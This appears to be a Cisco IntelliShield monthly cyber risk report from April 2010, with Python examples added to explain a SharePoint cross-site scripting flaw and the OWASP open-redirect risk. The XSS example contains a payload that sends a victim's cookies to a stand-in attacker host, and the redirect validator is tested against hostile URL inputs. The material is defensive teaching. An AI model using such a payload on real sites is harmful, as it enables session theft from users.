Vulnerability

Vulnerability and threat activity decreased this period compared with previous periods, and the vulnerability and threat levels for April 2010 were lower than in the preceding months of 2010. Following the elevated activity in March, driven largely by the CanSecWest hacking contest, the decrease may give vulnerability and patch management teams an opportunity to catch up on updates across their environments.

The period was highlighted by a Microsoft SharePoint Server cross-site scripting vulnerability that could allow an unauthenticated, remote attacker to obtain sensitive information, including user authentication cookies, and to take actions with the privileges of the compromised user account. Proof-of-concept exploit code has been publicly reported, and Microsoft has confirmed the vulnerability and released a security advisory; however, updates that correct the vulnerability are not yet available. The vulnerability is being widely discussed, and although no attacks have been reported, the level of interest indicates that working exploits will likely be developed and deployed. The vulnerability was reported in IntelliShield alert 20415.
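As an added illustration of the mechanism behind this alert (example code written for this report, not SharePoint code and not taken from the IntelliShield alert), the following Python shows a page that reflects a request parameter into HTML without encoding, the same page with encoding appropriate to each output context, and a check of the Set-Cookie attributes that limit what an injected script can steal. The parameter name "q", the cookie names and the attacker host are assumptions.

```python
"""Reflected cross-site scripting: a vulnerable page, two hardened variants
and a Set-Cookie check.  Added illustration only: not SharePoint code; the
parameter name "q", the cookie names and the attacker host are made up."""
import html
import json

# Constructed payload of the kind a reflected-XSS proof of concept carries:
# it closes the attribute it lands in, then ships document.cookie to the
# attacker.  The host is an assumption ("attacker.invalid" is not a real site).
PAYLOAD = ('"><script>document.location="http://attacker.invalid/?c="'
           '+document.cookie</script>')


def render_unsafe(q: str) -> str:
    """Vulnerable: the untrusted search term is spliced into HTML verbatim."""
    return f'<input name="q" value="{q}"><p>Results for {q}</p>'


def render_safe(q: str) -> str:
    """Hardened for text and double-quoted attribute contexts.

    html.escape(quote=True) turns & < > " ' into entities, so the payload can
    neither close the value="..." attribute nor open a new element.
    """
    safe = html.escape(q, quote=True)
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


def render_safe_js(q: str) -> str:
    """Hardened for a JavaScript string context inside a <script> block.

    HTML escaping is the wrong tool here (the entities would become literal
    text in the script).  JSON-encode the value instead, and neutralise "</"
    so the string can never contain "</script>", which the HTML parser treats
    as the end of the script element regardless of JavaScript quoting.
    """
    js = json.dumps(q).replace("</", "<\\/")
    return f"<script>var q = {js};</script>"


def attacker_script_present(page: str) -> bool:
    """True if the attacker's script element would be parsed out of the page."""
    return "<script>document.location" in page


def missing_cookie_flags(set_cookie: str) -> list:
    """Return the attributes a session cookie should carry but does not.

    HttpOnly keeps the cookie out of document.cookie, so the payload above
    cannot read it; Secure keeps it off cleartext connections.  Neither stops
    injected script from acting as the user inside the page (CSRF tokens are
    readable from the DOM), so these flags are defence in depth, not a
    substitute for output encoding.
    """
    attributes = set()
    for part in set_cookie.split(";")[1:]:
        attributes.add(part.strip().lower().split("=", 1)[0])
    return [flag for flag in ("httponly", "secure") if flag not in attributes]


if __name__ == "__main__":
    print("unsafe page carries attacker script:",
          attacker_script_present(render_unsafe(PAYLOAD)))
    print("safe page carries attacker script:  ",
          attacker_script_present(render_safe(PAYLOAD)))
    print(render_safe_js(PAYLOAD))
    print("missing flags:", missing_cookie_flags("session=abc123; Path=/; HttpOnly"))
```

The point of the third renderer is the caveat most XSS fixes miss: encoding is per output context, and a value that is safe inside an attribute is not automatically safe inside a script block or a URL.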

The Open Web Application Security Project (OWASP) has released its updated Top 10 Web Application Security Risks for 2010. The updated list contains two changes: the return of the previously removed Security Misconfiguration risk and the addition of the Unvalidated Redirects and Forwards risk.
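The new Unvalidated Redirects and Forwards entry covers the common "next=" or "returnUrl=" parameter that sends a user somewhere after login; if the value is not checked, a phishing link on the real domain can bounce the victim to an attacker site. The Python below is an added example (not OWASP's code, with made-up host names) of an allowlist check that mirrors how browsers parse URLs rather than how a naive string check sees them, covering the scheme-relative, backslash, triple-slash, userinfo and non-http scheme variants that defeat simple "starts with /" tests.

```python
"""Validating a user-supplied redirect target (OWASP Top 10 2010 A10,
Unvalidated Redirects and Forwards).  Added illustration; the host names and
the login-flow framing are assumptions, not from any real application."""
from urllib.parse import urlsplit

# Hosts we are willing to redirect to, lower-case (assumed example names).
ALLOWED_HOSTS = frozenset({"shop.example.com", "account.example.com"})


def is_safe_redirect(target: str, allowed_hosts: frozenset) -> bool:
    """Return True only if `target` cannot take the browser off our site.

    The checks follow browser URL parsing rather than Python's urlsplit alone:
    tabs and newlines are ignored, backslashes count as slashes in http(s)
    URLs, and "//host", "///host" and "http:host" forms are all absolute.
    """
    # Browsers drop ASCII tab/CR/LF anywhere in a URL and trim surrounding
    # whitespace, so do the same before looking at the structure.
    cleaned = "".join(ch for ch in target if ch not in "\t\r\n").strip()
    if not cleaned:
        return False
    # In special schemes a backslash is parsed as a forward slash, so
    # "/\evil.example" is really "//evil.example".
    cleaned = cleaned.replace("\\", "/")
    # Any run of leading slashes is collapsed to an authority marker by the
    # browser ("///evil.example" goes to evil.example); urlsplit would instead
    # report an empty netloc and a harmless-looking path.
    if cleaned.startswith("//"):
        cleaned = "//" + cleaned.lstrip("/")
    parts = urlsplit(cleaned)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, vbscript:, mailto: ...
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative: the host must be one of ours.
        # .hostname discards userinfo and port, so
        # "https://shop.example.com@evil.example/" yields "evil.example",
        # and "http:evil.example" (no authority) yields None and is rejected.
        host = parts.hostname
        return host is not None and host in allowed_hosts
    # Relative reference: accept only a site-local absolute path.  A bare
    # "orders" would resolve against the current page, so reject it too.
    return parts.path.startswith("/")


def redirect_after_login(next_param: str, allowed_hosts: frozenset,
                         fallback: str = "/") -> str:
    """Return the Location to send the user to after a successful login."""
    if next_param and is_safe_redirect(next_param, allowed_hosts):
        return next_param
    return fallback


if __name__ == "__main__":
    # Constructed inputs of the kind seen in open-redirect reports.
    for candidate in ["/orders", "https://shop.example.com/cart",
                      "//evil.example/x", "/\\evil.example", "///evil.example",
                      "https://shop.example.com@evil.example/",
                      "http:evil.example", "javascript:alert(1)",
                      "java\tscript:alert(1)", "orders"]:
        print(f"{candidate!r:45} -> {redirect_after_login(candidate, ALLOWED_HOSTS)}")
```

Two design choices are worth noting. The function is an allowlist, so anything it cannot classify with confidence is rejected rather than passed through, and the port is deliberately not checked because the allowlist is about which origin's content the user lands on; add a port check if your deployment needs one. Forwards (server-side dispatch to a page name taken from a parameter) need the same treatment with a list of permitted internal targets.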

IntelliShield published 75 events last week: 34 new events and 41 updated events. Of the 75 events, 55 were Vulnerability Alerts, two were Security Activity Bulletins, 17 were Threat Outbreak Alerts, and one was a Cyber Risk Report. The alert publication totals are as follows:

Weekly Alert Totals

Day            Date          New   Updated   Total
Friday         04/30/2010      1        16      17
Thursday       04/29/2010      9         2      11
Wednesday      04/28/2010      8         8      16
Tuesday        04/27/2010      8        10      18
Monday         04/26/2010      8         5      13
Weekly Total   —              34        41      75

2010 Monthly Alert Totals

Month          New   Updated   Monthly Total
January        158       259             417
February       177       253             430
March          194       324             518
April          208       167             375
Annual Total   737      1003            1740

Significant Alerts for April 26–May 2, 2010

Microsoft SharePoint Server 2007 versions SP2 and prior contain a cross-site scripting vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary HTML or script code in a user's browser. Proof-of-concept code that exploits this vulnerability is publicly available. Microsoft has confirmed this vulnerability, but software updates are not available.

Previous Alerts That Still Represent Significant Risk

A McAfee DAT file that was distributed to VirusScan applications has caused errors on certain Microsoft Windows XP-based systems. As a result of installing the 5958 DAT file and rebooting, systems may be rendered unusable. McAfee has released a knowledge base article with various workarounds.

Oracle Java contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on the system with the privileges of the user. Systems with Oracle Java JRE and JDK 6 Update 10 and later contain the affected ActiveX control and are vulnerable. Updates are available.

Multiple TLS implementations contain a vulnerability when renegotiating a Transport Layer Security (TLS) session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack. Proof-of-concept code that exploits this vulnerability is publicly available. Mozilla and Oracle, in addition to other vendors, have released updates for this vulnerability.

Microsoft has re-released a security advisory and updated software to address the Microsoft Internet Explorer invalid pointer reference access arbitrary code execution vulnerability. Functional exploit code is being used in ongoing attacks; a security bulletin and updated software are available from Microsoft.

Microsoft has released a security advisory with information about affected products to address the Microsoft Internet Explorer unsafe help file handling arbitrary code execution vulnerability. Proof-of-concept code that demonstrates code execution is available.

Physical

New York City Subway Master Key Gets Into Wrong Hands

Master keys to New York City subway entrances have inadvertently found their way into the hands of those who should not have had access, including those who are criminally inclined. The keys, which allow emergency officials (such as police, emergency medical services, and city transit staff) to enter special gates during times of crisis, are apparently being sold to willing buyers on the black market. While honest riders are rejecting the advances of those illegally selling the keys, the expected increase in New York City transit fares could sway some who would not normally resort to such dishonest acts.

IntelliShield Analysis: In the computer networking world, the concept of a physical master key could be equated to that of an administrator password for a device or application. Issues resulting from default, lost, or stolen administrator passwords have for years driven many companies to look for additional levels of security when protecting their networks, end hosts, and proprietary data. These additional levels of protection include technologies and policies such as two-factor authentication consisting of something you know (a PIN) and something you have (a key card), one-time passwords (OTPs), complex and frequently changed passwords, biometrics, separation of privileges, and role-based access controls. While some of these concepts may not be applicable in this scenario, or in many cases would increase the complexity and cost of protecting the New York City subway system, the net result would be a higher barrier to entry for those who should not be riding the subway for free, while giving legitimate riders a greater sense of safety.

Legal

The United States Federal Trade Commission (FTC), which is expected to release a set of best practices to address business concerns about online privacy by September 2010, met with aides to U.S. Senators and with staff from Facebook, the social networking website, to discuss online privacy concerns. Lawmakers have requested that the FTC issue guidelines that will help ensure that users' personal information is protected by social media companies. Officials from Facebook announced at a subsequent news conference that they would support FTC guidelines that companies could align with voluntarily.

IntelliShield Analysis: Regardless of pending FTC guidelines, concern over the safeguarding of users' privacy continues to grow. Social networking sites such as Facebook that force users to opt out of frequent innovations for sharing personal data, particularly with third-party advertisers, are attracting more attention from lawmakers for a number of reasons, one being that third-party advertisers are allowed to store user information indefinitely. As the tension between what users share voluntarily and what is shared involuntarily and harvested for profit increases, users are advised to keep an eye on the security settings of their accounts and to stay abreast of policy changes to the social websites they frequent.

Trust

There was no significant activity in this category during the time period.

Identity

There was no significant activity in this category during the time period.

Human

French Researchers Expose BitTorrent Privacy Threats

In a series of papers published over the last few months, researchers from the French National Institute for Research in Computer Science and Control (INRIA) have exposed various aspects that threaten the privacy of BitTorrent users. Among their findings, the INRIA researchers described how a single computer on the Internet could log and track the download and upload history of most BitTorrent users over a long period of time (103 days in their study). They also showed that 70% of the BitTorrent users who routed their traffic through the Tor anonymizing network could still be identified, and how that identification could lead to de-anonymizing the rest of their traffic over the Tor network.

IntelliShield Analysis: While BitTorrent has been shown to be a very efficient method of distributing large media files quickly, it has drawn considerable criticism from content authors whose material can easily be shared illegally. This research goes beyond that controversy, however, to show that even when BitTorrent is used only to distribute content legally, it presents a privacy risk to users. These privacy concerns have been demonstrated in traditional torrent tracker networks as well as in trackerless Distributed Hash Table (DHT) networks that aim to be more privacy-oriented. Users and organizations that rely on BitTorrent, or on underlying concepts like DHT, for peer-to-peer communication and file transfer should review the researchers' findings and assess any risks that may arise from them.

Geopolitical

Greek Debt Crisis Threatens to Spread

Eurozone finance ministers, along with European Central Bank and International Monetary Fund officials, agreed over the weekend on the basics of a bailout plan for debt-ridden Greece. The agreement includes tough austerity measures, including a three-year freeze on public sector wages, tax hikes, and a raising of the retirement age. It was hoped that the measures, pitched to skeptical Eurozone taxpayers as protective of the Euro rather than as a Greek bailout, would be enough to allay investor concerns over the risk of the debt contagion spreading. Besides being slow to take shape, the plan has many critics, who argue that without a basic restructuring of sovereign debt, Greece cannot hope to avoid default down the road. Asian countries argued that the measures were too lenient compared with the austerity measures shouldered by countries like Thailand during the Asian financial crisis. At the same time, a downgrading of Spain's and Portugal's sovereign debt last week seemed to confirm fears that slow-moving financial authorities had already failed to contain the crisis.

IntelliShield Analysis: Given the relatively small size of the Greek economy, Athens' debt crisis on its own may have been manageable. What has elevated it to a global concern is the widening of the problem to larger European economies such as Spain and Portugal, whose debts may be difficult for weakened Eurozone banks to absorb. Slow progress toward a bailout package is also of concern, as it casts doubt on the ability of EU countries to set aside individual national concerns in pursuit of regional solutions. Information security professionals can expect continued disruptions across Europe in the coming weeks as Berlin seeks Bundestag approval for the financial package, $11 billion in Greek debt comes due in mid-May, and planned general strikes take place. More broadly, the chaos that followed Iceland's recent volcanic eruption and the closing of European airspace is another example of the region's struggle to establish effective mechanisms for solving such problems. Over time, these problems will increasingly include crucial information technology issues, such as copyright enforcement, cross-border data privacy, anti-counterfeiting, and cyber security.

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.